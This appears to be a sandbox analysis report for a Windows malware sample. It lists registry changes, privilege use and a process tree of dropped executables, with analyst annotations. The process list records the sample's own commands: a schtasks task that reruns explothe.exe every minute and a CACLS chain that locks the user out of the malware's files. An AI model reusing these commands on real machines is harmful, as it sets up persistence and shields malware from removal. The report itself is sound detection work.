| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
Note: two processes are mixed here. 31839b57a4f11171d6abc8bbc4451ee4.exe fills the MuiCache with tzres.dll time-zone display names, the footprint of enumerating every system time zone (each resolved resource string is cached), which is host fingerprinting rather than tampering. The powershell.exe rows (SystemCertificates keys created, ZoneMap ProxyBypass and UNCAsIntranet set) are written under HKU\.DEFAULT, the profile hive used by LocalSystem, so that PowerShell instance was running as SYSTEM.
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Note: all rows are msedge.exe. Chromium-based browsers apply the block-non-Microsoft-binaries mitigation to their own child processes, so this is expected browser hardening, not malicious behaviour.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe
"C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\9EEB.exe
C:\Users\Admin\AppData\Local\Temp\9EEB.exe
C:\Users\Admin\AppData\Local\Temp\A053.exe
C:\Users\Admin\AppData\Local\Temp\A053.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A11F.bat" "
C:\Users\Admin\AppData\Local\Temp\A1EB.exe
C:\Users\Admin\AppData\Local\Temp\A1EB.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
C:\Users\Admin\AppData\Local\Temp\A298.exe
C:\Users\Admin\AppData\Local\Temp\A298.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
C:\Users\Admin\AppData\Local\Temp\A345.exe
C:\Users\Admin\AppData\Local\Temp\A345.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4372 -ip 4372
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 784
C:\Users\Admin\AppData\Local\Temp\C4E8.exe
C:\Users\Admin\AppData\Local\Temp\C4E8.exe
C:\Users\Admin\AppData\Local\Temp\C7D7.exe
C:\Users\Admin\AppData\Local\Temp\C7D7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
